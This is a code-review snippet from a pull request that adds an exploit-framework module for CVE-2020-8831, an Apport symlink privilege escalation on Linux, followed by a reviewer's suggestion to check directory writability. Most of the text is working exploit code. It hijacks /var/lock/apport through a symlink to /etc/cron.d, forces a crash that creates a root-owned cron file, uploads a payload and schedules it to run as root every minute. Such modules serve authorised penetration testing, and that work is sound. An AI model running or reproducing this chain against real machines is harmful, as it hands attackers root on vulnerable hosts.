modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb

```diff
@@ -0,0 +1,160 @@
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options [
+      OptString.new('WRITABLE_DIR', [true, 'A directory we can write to.', '/tmp']),
+      OptString.new('PAYLOAD_FILENAME', [true, 'Name of payload', Rex::Text.rand_text_alpha(rand(8..12))]),
+      OptString.new('CRON_INTERVAL', [true, 'Specify how often the Cron should run. Default is every minute.', '* * * * *'])
+    ]
+  end
+
+  def check
+    # If you are testing the module apport needs to be reinstalled on boot every time with
+    # sudo dpkg -i apport_2.20.11-0ubuntu21_all.deb 
+    # sudo rm -rf /var/lock/apport/ /tmp/payload /etc/cron.d/lock && unlink /var/lock/apport -> must be run after each subsequent test!
+    return CheckCode::Safe('Platform is not Linux') unless session.platform == 'linux'
+
+    # Check apport version
+    if !command_exists?('apport-cli')
+      return CheckCode::Safe('apport-cli does not appear to be installed or in the $PATH')
+    end
+
+    apport = cmd_exec('apport-cli --version').to_s
+
+    return CheckCode::Detected('Unable to determine apport version') if apport.blank?
+
+    # todo determine if prior versions of apport are vulnerable
+    apport_version = Rex::Version.new(apport.split('-').first)
+
+    vulnerable_version = Rex::Version.new('2.20.11')
+
+    if apport_version == vulnerable_version
+      vprint_good("Apport appears to be vulnerable.")
+      return CheckCode::Appears
+    end 
+
+    CheckCode::Safe
+  end
+
+  # Crash Apport and hijack a symlink
+  # this will creat a rwx /etc/cron.d/lock owned by root
+  def hijack_apport
+    
+    print_status("Creating symlink...")
+    link = cmd_exec ('ln -s /etc/cron.d /var/lock/apport')
+    print_status(link)
+
+    # Create crash and trigger apport
+    print_status("Triggering crash...")
+    cmd_exec 'sleep 10s & kill -11 $!'
+
+    @cron = '/etc/cron.d/lock'
+
+    # Make sure it's writable and owned by root
+    unless exist?(@cron) 
+      fail_with(Failure::NotFound, 'Exploit was unable to create a crontab owned by root.')
+    else
+      print_good("Successfully created /etc/cron.d/lock")
+    end
+  end
+
+  def write_payload
+    print_status 'Uploading payload..'
+
+    payload_dir = datastore['Writable_Dir']
+
+    payload_dir += '/' unless payload_dir.ends_with? '/'
+
+    payload_file = datastore['Payload_Filename']
+
+    @payload_dest = "#{payload_dir}#{payload_file}"
+
+    # create the payload
+    if target.arch.first == ARCH_CMD
+      payload = payload.encoded
+      upload_and_chmodx @payload_dest, payload
+    else
+      upload_and_chmodx @payload_dest, generate_payload_exe
+    end
+  end
+
+  def write_cron
+    cron_interval = datastore['CRON_INTERVAL']
+    data = "#{cron_interval} root #{@payload_dest}\n"
+    write_file(@cron, data)
+    # crontab won't execute as root if group/other is writable
+    print_good "Successfully wrote crontab!"
+  end
+
+  def exploit
```

Comment:
The module should check if the user-specified directory is writable before attempting exploitation. (There is no point performing exploitation only to have the exploit fail because the payload was not written to disk.)

```suggestion
  def exploit
    fail_with(Failure::BadConfig, "#{datastore['WritableDir']} is not writable") unless writable?(datastore['WritableDir'])
```